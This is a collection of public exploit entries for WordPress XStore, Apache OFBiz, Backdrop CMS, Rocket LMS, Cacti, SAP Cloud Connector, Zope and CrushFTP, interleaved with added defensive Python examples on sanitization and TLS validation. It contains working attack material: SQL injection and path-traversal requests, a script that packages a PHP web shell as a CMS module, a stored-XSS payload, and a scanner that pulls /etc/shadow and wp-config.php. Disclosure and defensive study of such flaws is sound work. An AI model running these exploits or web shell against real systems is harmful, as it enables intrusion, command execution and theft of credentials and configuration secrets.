<pre><code># Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi<br /># Google Dork: N/A<br /># Date: 2024-05-16<br /># Exploit Author: Abdualhadi khalifa (https://twitter.com/absholi_ly)<br /># Version: 5.3.5<br /># Tested on: Windows10<br /># CVE: CVE-2024-33559<br /><br /><br />PoC<br />https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc<br /><br />POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1<br />Host: example.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: keep-alive<br />Upgrade-Insecure-Requests: 1<br /><br /></code></pre>
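<p>The request above injects through the search parameter s. The following Python example is added here and is not part of the original advisory or of the XStore theme; it assumes a stand-in title search over a wp_posts table (the theme's real query is not shown on the page) and uses SQLite to contrast string concatenation with a bound parameter plus LIKE-wildcard escaping. The URL-decoded payload from the PoC request is used as the search term; the table contents are constructed.</p>

```python
import sqlite3
from urllib.parse import unquote_plus

# Search term exactly as sent in the PoC request's s= parameter, URL-decoded.
PAYLOAD = unquote_plus("%27%3B+SELECT+*+FROM+wp_posts%3B+--")  # "'; SELECT * FROM wp_posts; --"

# Constructed sample rows standing in for a WordPress posts table (assumption:
# the theme searches post titles; the real query is not on the page).
SAMPLE_TITLES = ["Hello world!", "50% off summer sale", "Site news"]


def _demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT)")
    conn.executemany("INSERT INTO wp_posts (post_title) VALUES (?)",
                     [(t,) for t in SAMPLE_TITLES])
    return conn


def search_unsafe(conn, term):
    """Vulnerable pattern: the user-controlled term is spliced into the SQL text."""
    sql = ("SELECT post_title FROM wp_posts WHERE post_title LIKE '%" + term + "%' "
           "ORDER BY ID")
    return [row[0] for row in conn.execute(sql)]


def _escape_like(term):
    """Escape LIKE metacharacters so a user cannot widen the match with % or _."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(conn, term):
    """Hardened pattern: bound parameter plus ESCAPE clause; the term is always data."""
    sql = ("SELECT post_title FROM wp_posts WHERE post_title LIKE ? ESCAPE '\\' "
           "ORDER BY ID")
    return [row[0] for row in conn.execute(sql, ("%" + _escape_like(term) + "%",))]


def titles_matching(term):
    """Run the hardened search against the sample table."""
    return search_safe(_demo_db(), term)


def unsafe_titles_matching(term):
    """Run the vulnerable search; raises if the term changed the statement structure."""
    return search_unsafe(_demo_db(), term)


def payload_alters_statement(term):
    """True when the spliced term makes the engine see more than one statement.

    sqlite3 refuses stacked statements, so the vulnerable path fails loudly here;
    a driver that allows multi-statement execution would run the injected query.
    """
    try:
        unsafe_titles_matching(term)
    except (sqlite3.Warning, sqlite3.Error):
        return True
    return False


if __name__ == "__main__":
    print("safe, payload  :", titles_matching(PAYLOAD))        # payload treated as data
    print("safe, '%'      :", titles_matching("%"))            # literal percent sign only
    print("unsafe, '%'    :", unsafe_titles_matching("%"))     # wildcard leaks: every row
    print("payload alters statement:", payload_alters_statement(PAYLOAD))
```

<p>The WordPress equivalent of search_safe is $wpdb-&gt;prepare() combined with $wpdb-&gt;esc_like(); the point the test makes is that the hardened query returns nothing for the payload and matches only a literal percent sign, while the concatenated query either widens the match or hands a second statement to the engine.</p>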
<pre><code># Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal<br /># Google Dork: N/A<br /># Date: 2024-05-16<br /># Exploit Author: Abdualhadi khalifa (https://twitter.com/absholi_ly)<br /># Vendor Homepage: https://ofbiz.apache.org/<br /># Software Link: https://ofbiz.apache.org/download.html<br /># Version: 18.12.12 and below<br /># Tested on: Windows10<br /><br /><br />PoC<br />1-<br />POST /webtools/control/xmlrpc HTTP/1.1<br />Host: vulnerable-host.com<br />Content-Type: text/xml<br /><br /><?xml version="1.0"?><br /><methodCall><br /> <methodName>example.createBlogPost</methodName><br /> <params><br /> <param><br /> <value><string>../../../../../../etc/passwd</string></value><br /> </param><br /> </params><br /></methodCall><br /><br />OR<br /><br />2-<br />POST /webtools/control/xmlrpc HTTP/1.1<br />Host: vulnerable-host.com<br />Content-Type: text/xml<br /><br /><?xml version="1.0"?><br /><methodCall><br /> <methodName>performCommand</methodName><br /> <params><br /> <param><br /> <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value><br /> </param><br /> </params><br /></methodCall><br /><br /></code></pre>
<pre><code># Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE)<br /># Date: 04/27/2024<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://backdropcms.org/<br /># Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip<br /># Version: latest<br /># Tested on: MacOS<br /><br />import os<br />import time<br />import zipfile<br /><br /><br />def create_files():<br />    info_content = """<br />type = module<br />name = Block<br />description = Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page.<br />package = Layouts<br />tags[] = Blocks<br />tags[] = Site Architecture<br />version = BACKDROP_VERSION<br />backdrop = 1.x<br /><br />configure = admin/structure/block<br /><br />; Added by Backdrop CMS packaging script on 2024-03-07<br />project = backdrop<br />version = 1.27.1<br />timestamp = 1709862662<br />"""<br />    shell_info_path = "shell/shell.info"<br />    os.makedirs(os.path.dirname(shell_info_path), exist_ok=True)  # Creates the directory<br />    with open(shell_info_path, "w") as file:<br />        file.write(info_content)<br /><br />    shell_content = """<br /><html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br />if(isset($_GET['cmd']))<br />{<br />system($_GET['cmd']);<br />}<br />?><br /></pre><br /></body><br /></html><br />"""<br />    shell_php_path = "shell/shell.php"<br />    with open(shell_php_path, "w") as file:<br />        file.write(shell_content)<br /><br />    return shell_info_path, shell_php_path<br /><br /><br />def create_zip(info_path, php_path):<br />    zip_filename = "shell.zip"<br />    with zipfile.ZipFile(zip_filename, 'w') as zipf:<br />        # Store the files under the shell folder<br />        zipf.write(info_path, arcname='shell/shell.info')<br />        zipf.write(php_path, arcname='shell/shell.php')<br />    return zip_filename<br /><br /><br />def main(url):<br />    print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")<br />    time.sleep(3)<br /><br />    print("Evil module generating...")<br />    time.sleep(2)<br /><br />    info_path, php_path = create_files()<br />    zip_filename = create_zip(info_path, php_path)<br /><br />    print("Evil module generated!", zip_filename)<br />    time.sleep(2)<br /><br />    print("Go to " + url + "/admin/modules/install and upload the " +<br />          zip_filename + " for Manual Installation.")<br />    time.sleep(2)<br /><br />    print("Your shell address:", url + "/modules/shell/shell.php")<br /><br /><br />if __name__ == "__main__":<br />    import sys<br />    if len(sys.argv) < 2:<br />        print("Usage: python script.py [url]")<br />    else:<br />        main(sys.argv[1])<br /><br /></code></pre>
<pre><code># Title: Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS)<br /># Date: 04/16/2024<br /># Exploit Author: Sergio Medeiros<br /># Vendor Homepage: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735<br /># Software Link: https://lms.rocket-soft.org<br /># Version: 1.9<br /># Tested on Firefox and Chrome Browsers<br /># Patched Version: Patch Pending<br /># Category: Web Application<br /># CVE: CVE-2024-34241<br /># Exploit link: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide<br /># PoC:<br /><br />In order to exploit this systemic stored XSS vulnerability, identify the areas of the web application that use a WYSIWYG editor, for example the create/edit course description section.<br />Input random text in the description section and create the course while intercepting the request with Burp Suite or your preferred proxy.<br /><br />In the *description* parameter, or whichever parameter carries the user input from the WYSIWYG editor, insert the following payload and then issue the request:<br /><details/open/ontoggle=prompt(origin)><br /><br /></code></pre>
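<p>The payload above works because a tag reaches storage and rendering with its event-handler attribute intact. The following Python example is added here and is not part of the advisory or of Rocket LMS; it assumes a stand-in allowlist sanitizer built on the standard library's html.parser, of the kind the server side of a WYSIWYG field should apply before storing or rendering the description. The tag and attribute allowlists are assumptions chosen for a course-description field, and the advisory's payload is embedded as test input.</p>

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlist for a course-description field: formatting only, no scripts,
# no event handlers, links restricted to safe schemes.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "ul", "ol", "li",
                "h2", "h3", "blockquote", "code", "pre", "a"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}

# The stored-XSS payload from the advisory, used here as test input.
ADVISORY_PAYLOAD = "<details/open/ontoggle=prompt(origin)>"


def _safe_href(value):
    """Allow http(s), mailto, site-relative and fragment links; blocks javascript: and data:."""
    v = (value or "").strip().lower()
    return v.startswith(("http://", "https://", "mailto:", "/", "#"))


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the fragment from the allowlist; everything else becomes plain text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped entirely (its text content is still kept)
        kept = []
        for name, value in attrs:
            if name.startswith("on"):
                continue  # every event handler (onload, ontoggle, onerror, ...) is dropped
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not _safe_href(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return  # stray or disallowed closing tag
        while self.open_tags:  # close any unclosed children first
            closed = self.open_tags.pop()
            self.out.append("</%s>" % closed)
            if closed == tag:
                break

    def handle_data(self, data):
        self.out.append(escape(data))  # text is always entity-encoded

    def result(self):
        while self.open_tags:  # close whatever the author left open
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize(html_fragment):
    """Return a fragment containing only allowlisted tags and attributes."""
    parser = AllowlistSanitizer()
    parser.feed(html_fragment)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    print(repr(sanitize("Intro " + ADVISORY_PAYLOAD + " course")))
    print(sanitize('<a href="javascript:alert(1)" onclick="x()">syllabus</a>'))
```

<p>Rejecting by allowlist rather than by blocklisting known-bad attributes is what makes the check hold for tag or attribute names the author never anticipated; the same sanitizer should run on the stored value when it is rendered, not only at submission time, so content that entered through another path is covered too.</p>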
<pre><code>----------------------------------------------------------------<br />Cacti <= 1.2.26 (import.php) Remote Code Execution Vulnerability<br />----------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://cacti.net<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.2.26 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located within the "import_package()" function<br />defined in the /lib/import.php script. This function blindly trusts<br />the filename and file content provided within the uploaded XML data,<br />and writes such files into the Cacti base path (or even outside it, since<br />path traversal sequences are not filtered). This can be exploited to<br />write or overwrite arbitrary files on the web server, leading to<br />execution of arbitrary PHP code or other security impacts.<br /><br />Successful exploitation of this vulnerability requires a user account<br />having the "Import Templates" permission.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 1.2.27 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[17/01/2024] - Vendor notified through GitHub<br />[12/05/2024] - Version 1.2.27 released<br />[13/05/2024] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org) has<br />assigned the name CVE-2024-25641 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2024-04<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240513-0 ><br />=======================================================================<br /> title: Tolerating Self-Signed Certificates<br /> product: SAP® Cloud Connector<br /> vulnerable version: 2.15.0 - 2.16.1 (Portable and Installer)<br /> fixed version: 2.16.2 (Portable and Installer)<br /> CVE number: CVE-2024-25642<br /> impact: high<br /> homepage: https://www.sap.com/about.html<br /> found: 2023-11-13<br /> by: Mingshuo Li (Office Munich)<br /> Fabian Hagg<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"The Cloud Connector is an optional on-premise component that is needed to<br />integrate on-demand applications with customer backend services and is the<br />counterpart of SAP Connectivity service."<br /><br />Source: https://tools.hana.ondemand.com/#cloud<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends implementing security note 3424610; according to the<br />vendor, the documented issue is fixed in version 2.16.2. 
We<br />advise installing the correction as a matter of priority to keep<br />business-critical data secured.<br /><br />Source: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/february-2024.html<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Tolerating Self-Signed Certificates (CVE-2024-25642)<br />As per vendor documentation, the authentication between SCC and SAP BTP is guaranteed<br />mutually:<br /><br />"The tunnel itself is using TLS with strong encryption of the communication,<br />and mutual authentication of both communication sides, the client side<br />(Cloud Connector) and the server side (SAP BTP)."<br /><br />Source: https://help.sap.com/docs/connectivity/sap-btp-connectivity-cf/inbound-connectivity#tls-tunnel<br /><br />It was however discovered that the SCC trusts self-signed X.509 server certificates<br />for transport security to establish outbound connections with cloud-related<br />endpoints. Thus, an attacker can impersonate the genuine servers to interact<br />with the SCC, hence breaking the mutual authentication promise. 
Our analysis furthermore shows<br />that the product does not implement certificate pinning for the<br />trusted endpoints.<br /><br />The security impact of this vulnerability is rated high: because self-signed<br />certificates are trusted, SCC is unable to distinguish between genuine and<br />malicious SAP BTP endpoints, which makes trivial adversary-in-the-middle<br />attacks possible.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Tolerating Self-Signed Certificates (CVE-2024-25642)<br />A "tunnel" established between a subaccount of SAP BTP and SCC is a<br />long-lived bi-directional WebSocket over TLS customized by the vendor.<br />Such a tunnel is initiated by the SCC (the reverse invoke approach),<br />to give the administrator full control of the tunnel.<br /><br />Two tunnels established by SCC are protected by TLS with respect to encrypted<br />communication. However, SCC does not verify the authenticity of the<br />certification authority, hence allowing an attacker to impersonate the target<br />server using self-signed certificates.<br /><br />In particular, the attack targets the following two endpoints, but is not<br />limited to the region host us10.<br /><br />- connectivitynotification.cf.us10.hana.ondemand.com<br />- connectivity.us10.trial.applicationstudio.cloud.sap<br /><br />Note that the following endpoint, which is used for the initial certificate<br />signing request by SCC and to receive the BTP subaccount credentials, is<br />not susceptible to this issue.<br /><br />- connectivitycertsigning.cf.us10.hana.ondemand.com<br /><br />Nonetheless, impersonating the two vulnerable endpoints above suffices to<br />silently eavesdrop on and manipulate network traffic between SCC and SAP BTP.<br /><br />Without loss of generality, the first endpoint is taken as an example to<br />demonstrate the issue by the following steps:<br /><br />1. 
Add an entry in /etc/hosts of the SCC host as below to resolve the host name<br /> to an attacker-controlled IP address:<br /><br /> 192.168.1.100 connectivitynotification.cf.us10.hana.ondemand.com<br /><br />2. Generate a self-signed certificate with the spoofed hostname as common name<br /><br />```<br />$ openssl req -x509 -newkey rsa:4096 -keyout conn-noti-key.pem -out conn-noti-cert.pem -sha256 -days 3650 -nodes -subj "/C=DE/ST=Baden-Wuerttemberg/L=Walldorf/O=SAP <br />SE/OU=ITSecurity/CN=connectivitynotification.cf.us10.hana.ondemand.com"<br />```<br /><br />3. Start an HTTPS server on the attacker machine to receive the connection from<br /> SCC, using the self-signed certificate created in step 2<br /><br />The following Python script can be used to start the HTTPS server:<br />```<br />$ cat https-dummy-server.py<br />import http.server<br />import ssl<br /><br />server_address = ("192.168.1.100", 443)<br />httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)<br />httpd.socket = ssl.wrap_socket(httpd.socket,<br /> server_side=True,<br /> certfile="self-signed-cert/conn-noti-cert.pem",<br /> keyfile="self-signed-cert/conn-noti-key.pem",<br /> ssl_version=ssl.PROTOCOL_TLS)<br />httpd.serve_forever()<br />```<br /><br />4. Connect to a subaccount of BTP, for example US East AWS, in the SCC<br /> Administration UI<br /><br />As soon as the connection is launched, the dummy web server will receive the<br />request as shown below:<br /><br />```<br />$ python3 https-dummy-server.py<br />192.168.1.200 - - [10/Nov/2023 12:00:00] "GET /connectivity HTTP/1.1" 200 -<br />```<br /><br />This observation confirms that the TLS connection between SCC and the spoofed<br />BTP endpoint operated on the attacker's machine has been successfully established<br />although the server presented a self-signed certificate. 
No security warning<br />message is displayed in the Administration UI, making the attack<br />surreptitious.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested, which were the latest versions available<br />at the time of the test:<br /><br />* SAP Cloud Connector Linux x86_64 Version 2.16.0<br />* SAP Cloud Connector Linux (Portable) x86_64 Version 2.16.0<br /><br />According to the vendor, the vulnerability is a regression and affects the<br />versions 2.15.0 - 2.16.1.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-11-14: Contacting vendor through vulnerability submission web form<br />2023-11-17: Vendor confirms receipt and assigns SAP security incident numbers to<br /> the four submitted findings: 2370150975, 2370150977, 2370150994, 2370151022<br />2023-11-20: Vendor informs that the reported issues have been assigned to the<br /> appropriate development teams for analysis<br />2023-12-05: Requesting status update<br />2023-12-05: Vendor informs that 2370151022 has been rejected<br />2023-12-05: Issuing rebuttal for 2370151022<br />2023-12-06: Vendor contemplates further analysis<br />2023-12-14: Vendor decides not to take any action on 2370151022 and rejects<br /> 2370150977 and 2370150975 as well.<br />2023-12-15: Vendor accepts 2370150994<br />2024-01-05: Asked vendor to comment on the three rejected issues<br />2024-01-10: Vendor gives detailed rationale for the rejection of 2370150975<br />2024-01-12: Issuing rebuttal for 2370150975<br />2024-01-15: Vendor insists on rejection of 2370150975 and closes the ticket.<br /> Removing the three rejected potential security issues from the advisory.<br />2024-02-13: Release of SAP Security Patch Day, security note #3424610<br />2024-02-26: Asking for the disclosure guideline to publish finding 2370150994<br />2024-02-26: Vendor confirms the three-month embargo<br />2024-05-13: Coordinated release of SEC Consult advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version 2.16.2 which can be downloaded from their<br />website:<br />https://tools.hana.ondemand.com/#cloud<br /><br />Also see the vendor's security note #3424610 for further details:<br />https://me.sap.com/notes/3424610<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF M. Li, F. Hagg / @2024<br /></code></pre>
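<p>The finding above is an outbound TLS client that accepts any server certificate. The following Python example is added here and is not part of the advisory or of SAP Cloud Connector; it shows what a strict client looks like in the standard library's ssl module (chain validation plus hostname checking) next to the permissive configuration class that produces the behaviour described, and adds a certificate-fingerprint pin as the extra layer the advisory notes is missing. Host, port, CA file and pin value are assumptions supplied by the caller; the DER bytes used in the self-test are constructed.</p>

```python
import hashlib
import hmac
import socket
import ssl


def strict_client_context(cafile=None):
    """Client context that validates the chain and the hostname (the defended state)."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=cafile)
    ctx.verify_mode = ssl.CERT_REQUIRED   # a self-signed or unknown-CA certificate fails the handshake
    ctx.check_hostname = True              # the certificate must match the endpoint name
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def permissive_client_context():
    """The configuration class behind the finding: any certificate is accepted."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_is_strict(ctx):
    """Audit helper: True only when both chain and hostname validation are on."""
    return ctx.verify_mode == ssl.CERT_REQUIRED and ctx.check_hostname


def cert_fingerprint(der_cert):
    """SHA-256 over the DER encoding, the value an operator records as the pin."""
    return hashlib.sha256(der_cert).hexdigest()


def pin_matches(der_cert, pinned_hex):
    """Constant-time comparison of the presented certificate against the pin."""
    return hmac.compare_digest(cert_fingerprint(der_cert), pinned_hex.lower())


def open_pinned_connection(host, port, pinned_hex, cafile=None, timeout=10):
    """Handshake with full validation, then enforce the pin on the leaf certificate.

    Raises ssl.SSLCertVerificationError for an untrusted or mismatched certificate
    and ssl.SSLError for a pin mismatch; never falls back to an unverified connection.
    """
    ctx = strict_client_context(cafile)
    raw = socket.create_connection((host, port), timeout=timeout)
    try:
        tls = ctx.wrap_socket(raw, server_hostname=host)
    except Exception:
        raw.close()
        raise
    presented = tls.getpeercert(binary_form=True)
    if not pin_matches(presented, pinned_hex):
        tls.close()
        # Log-worthy event: a certificate with a valid chain that is not the expected one.
        raise ssl.SSLError("pin mismatch for %s: presented %s"
                           % (host, cert_fingerprint(presented)))
    return tls


if __name__ == "__main__":
    # Offline demonstration with constructed DER bytes; a real pin is taken from the
    # genuine endpoint's certificate out of band, never from the first connection.
    sample_der = b"constructed-der-bytes"
    print("strict context passes audit:", context_is_strict(strict_client_context()))
    print("permissive context passes audit:", context_is_strict(permissive_client_context()))
    print("pin match:", pin_matches(sample_der, cert_fingerprint(sample_der)))
```

<p>With the strict context, the self-signed certificate from the advisory's step 2 fails inside wrap_socket before any request is sent; the pin check catches the remaining case of a certificate issued by a CA the client trusts but not for this endpoint, which is the gap the advisory's note on missing certificate pinning refers to.</p>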
<pre><code># Vulnerability Report<br /><br />## Title: Command Argument Injection Vulnerability in Zope WSGI Instance Creation Script Leading to RCE<br /><br />### Description:<br />A command argument injection vulnerability has been identified in the Zope WSGI instance creation script used by the Zope web application server framework, which is maintained by the Zope Foundation. The script, mkwsgiinstance, facilitates the setup of new Zope WSGI application instances and involves specifying the Python interpreter, among other parameters, via command-line arguments. The flaw stems from insufficient validation of the Python interpreter path, allowing an attacker to execute arbitrary shell commands.<br /><br />### Affected Product:<br />Product: Zope WSGI instance creation script (mkwsgiinstance)<br />Version: All versions prior to the most recent update<br /><br />### Impact:<br />This vulnerability permits an attacker with local access to the server to execute arbitrary commands with the privileges of the user running the mkwsgiinstance script. The potential impacts include unauthorized information disclosure<br /><br />### POC:<br /><br />```bash<br />(env) root@lab:/opt/Zope# mkwsgiinstance -p "/usr/bin/mkdir" -d "/tmp/temp;"<br />Please choose a username and password for the initial user.<br />These will be the credentials you use to initially manage<br />your new Zope instance.<br /><br />Username: d<br />Password: <br />Verify password: <br />(env) root@lab:/opt/Zope# ls /tmp<br />'temp;'<br />```<br /><br />In this example, the attacker replaces the Python interpreter argument (-p) with the mkdir command, followed by an arbitrary directory path. 
Due to inadequate command-line argument sanitization, the script executes the mkdir command, illustrating arbitrary command execution.<br /><br />### Vulnerable Code Snippet:<br /><br />```python<br />if opt in ("-p", "--python"):<br />    python = os.path.abspath(os.path.expanduser(arg))<br />    if not os.path.exists(python) and os.path.isfile(python):<br />        usage(sys.stderr, "The Python interpreter does not exist.")<br />        sys.exit(2)<br />```<br /><br />This code snippet fails to adequately validate the python variable, which directly influences subprocess commands, enabling command injection when malicious inputs are supplied.<br /><br />### CVSS Calculated Vulnerability Score:<br />https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />### Credits:<br /><br />This vulnerability was disclosed by Aymane MAZGUITI / Ilyase Dehy.<br /></code></pre>
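<p>The condition in the snippet above can never be true: "not exists and isfile" requires a path that both does not exist and is a regular file, so every -p value passes, and /usr/bin/mkdir is an existing executable in any case. The following Python example is added here and is not part of the advisory or of Zope's mkwsgiinstance; it shows the check a hardened version would perform (existence, regular file, executable, and a probe that the candidate really behaves like a Python 3 interpreter) and how the path is then handed to subprocess as an argument list rather than through a shell, so a value such as "/tmp/temp;" stays a literal argument. The function names are assumptions.</p>

```python
import os
import shlex
import subprocess
import sys

# A genuine interpreter runs this and prints "3"; /usr/bin/mkdir exits non-zero on "-c".
PROBE = "import sys; print(sys.version_info[0])"


def check_interpreter(arg, timeout=20):
    """Validate a user-supplied -p/--python value.

    Returns (ok, reason, resolved_path). Nothing here is ever passed to a shell.
    """
    python = os.path.abspath(os.path.expanduser(arg))
    if not (os.path.exists(python) and os.path.isfile(python)):
        return False, "The Python interpreter does not exist.", python
    if not os.access(python, os.X_OK):
        return False, "The Python interpreter is not executable.", python
    if any(ord(ch) < 32 for ch in python):
        return False, "Control characters in interpreter path.", python
    try:
        proc = subprocess.run([python, "-c", PROBE], capture_output=True,
                              text=True, timeout=timeout)
    except (OSError, subprocess.SubprocessError) as exc:
        return False, "Could not execute candidate: %s" % exc, python
    if proc.returncode != 0 or proc.stdout.strip() != "3":
        return False, "Candidate does not behave like a Python 3 interpreter.", python
    return True, "ok", python


def run_with_interpreter(python, script_args, timeout=60):
    """Run a script with the validated interpreter; list form, no shell expansion."""
    ok, reason, python = check_interpreter(python)
    if not ok:
        raise ValueError(reason)
    return subprocess.run([python] + list(script_args), capture_output=True,
                          text=True, timeout=timeout)


def shell_reference(python):
    """If the path must be written into a generated shell script, quote it."""
    return shlex.quote(python)


def current_interpreter_path():
    """The interpreter running this module (used by the self-check below)."""
    return sys.executable


def current_interpreter_passes():
    """Sanity check: the running interpreter satisfies its own rules."""
    return check_interpreter(current_interpreter_path())[0]


if __name__ == "__main__":
    for candidate in (current_interpreter_path(), "/usr/bin/mkdir", "/nonexistent/python"):
        ok, reason, path = check_interpreter(candidate)
        print("%-40s %s (%s)" % (path, "accepted" if ok else "rejected", reason))
```

<p>The probe is what turns "an existing executable" into "a Python interpreter"; without it the existence and mode checks alone still accept the mkdir value from the PoC. Quoting with shlex.quote matters only where the path is embedded into a generated script; the instance creation itself should stay in list form.</p>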
<pre><code># Exploit Title: CrushFTP Directory Traversal<br /># Google Dork: N/A<br /># Date: 2024-04-30<br /># Exploit Author: Abdualhadi khalifa (https://twitter.com/absholi_ly)<br /># Vendor Homepage: https://www.crushftp.com/<br /># Software Link: https://www.crushftp.com/download/<br /># Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)<br /># Tested on: Windows10<br /><br />import requests<br />import re<br /><br /># Regular expression to validate the URL<br />def is_valid_url(url):<br />    regex = re.compile(<br />        r'^(?:http|ftp)s?://'  # http:// or https://<br />        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...<br />        r'localhost|'  # localhost...<br />        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|'  # ...or ipv4<br />        r'\[?[A-F0-9]*:[A-F0-9:]+\]?)'  # ...or ipv6<br />        r'(?::\d+)?'  # optional: port<br />        r'(?:/?|[/?]\S+)$', re.IGNORECASE)<br />    return re.match(regex, url) is not None<br /><br /># Function to scan for the vulnerability<br />def scan_for_vulnerability(url, target_files):<br />    print("Scanning for vulnerability in the following files:")<br />    for target_file in target_files:<br />        print(target_file)<br /><br />    for target_file in target_files:<br />        try:<br />            response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)<br />            if response.status_code == 200 and target_file.split('/')[-1] in response.text:<br />                print("vulnerability detected in file", target_file)<br />                print("Content of file", target_file, ":")<br />                print(response.text)<br />            else:<br />                print("vulnerability not detected or unexpected response for file", target_file)<br />        except requests.exceptions.RequestException as e:<br />            print("Error connecting to the server:", e)<br /><br /># User input<br />input_url = input("Enter the URL of the CrushFTP server: ")<br /><br /># Validate the URL<br />if is_valid_url(input_url):<br />    # Expanded list of allowed files<br />    target_files = [<br />        "/var/www/html/index.php",<br />        "/var/www/html/wp-config.php",<br />        "/etc/passwd",<br />        "/etc/shadow",<br />        "/etc/hosts",<br />        "/etc/ssh/sshd_config",<br />        "/etc/mysql/my.cnf",<br />        # Add more files as needed<br />    ]<br />    # Start the scan<br />    scan_for_vulnerability(input_url, target_files)<br />else:<br />    print("Invalid URL entered. Please enter a valid URL.")<br /><br /></code></pre>
